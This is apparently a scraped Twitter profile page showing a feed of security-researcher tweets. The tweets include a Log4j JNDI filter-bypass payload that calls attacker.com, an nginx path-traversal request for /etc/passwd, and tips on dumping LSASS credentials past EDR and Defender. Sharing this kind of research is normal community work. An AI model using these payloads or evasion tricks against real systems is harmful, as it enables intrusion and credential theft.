August (@0xaugust)'s Twitter Profile
August

@0xaugust

ID: 1284173122988437504

17-07-2020 17:09:03

17 Tweet

7 Followers

220 Following

Brandon Forbes (@rezn0k)

If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} This gets past every filter I've found so far. There's no shortage of these bypasses. #log4j

Grzegorz Tworek (@0gtweet)

If you grab a copy of kd.exe, symsrv.dll, and dbghelp.dll (i.e. from the EWDK ISO image) you can create a full memory dump with "livekd64 -o mem.dmp". It is enough to put these binaries into one folder. Access to the symbols server or the correct version of ntkrnlmp.pdb will be required.

CyCatz (@cycatz_official)

#bugbountytips #bugbounty Nginx Merge slashes Path traversal #nginx #RCE Payload : GET ///////../../../etc/passwd More..bit.ly/33ge4jq

S4ntiagoP (@s4ntiago_p)

Added a small update to nanodump, you can now create a snapshot of LSASS with PssNtCaptureSnapshot. Thanks to matteo malvica ⭕ for "Evading WinDefender ATP credential-theft: a hit after a hit-and-miss start" github.com/helpsystems/na…

MalwareHunterTeam (@malwrhunterteam)

Don't really understand this "Industrial Spy" gang. They pwn networks, steal files, then instead of clearly asking a ransom, they leave something more like an ad for their leak/market site? 🤔 Michael Gillespie

Petrus Viet (@vietpetrus)

I have found vulnerabilities CVE-2022-31656 and CVE-2022-31659 leading to unauthenticated remote code execution affecting many #VMware products, such as Workspace ONE. Technical writeup and POC soon to follow. Recommend to patch or mitigate immediately. vmware.com/security/advis…

Arseniy Sharoglazov (@_mohemiv)

🫢 Backdoor password in a ZIP!

1⃣ Create ZIP: 7z a x.zip /etc/passwd -mem=AES256 -p
Use this pwd: Nev1r-G0nna-G2ve-Y8u-Up-N5v1r-G1nna-Let-Y4u-D1wn-N8v4r-G5nna-D0sert-You

2⃣ Unpack it: 7z e x.zip
Use this pwd: pkH8a0AqNbHcdw8GrmSp

😅 Magic!

Mor Davidovich (@dec0ne)

Happy to share a new blog post I wrote about how I managed to dump LSASS undetected using a simple MiniDumpWriteDump against some of the most advanced EDRs in the market. "It’s all in the details: The curious case of an LSASS dumper gone undetected" dec0ne.github.io/research/2022-…

Kurosh Dabbagh (@_kudaes_)

I find it ridiculous that you just need to prepend one single null byte to a lsass dump to make Defender stop detecting it as soon as it touches disk. No encryption, no encoding, just a single null byte 😅😅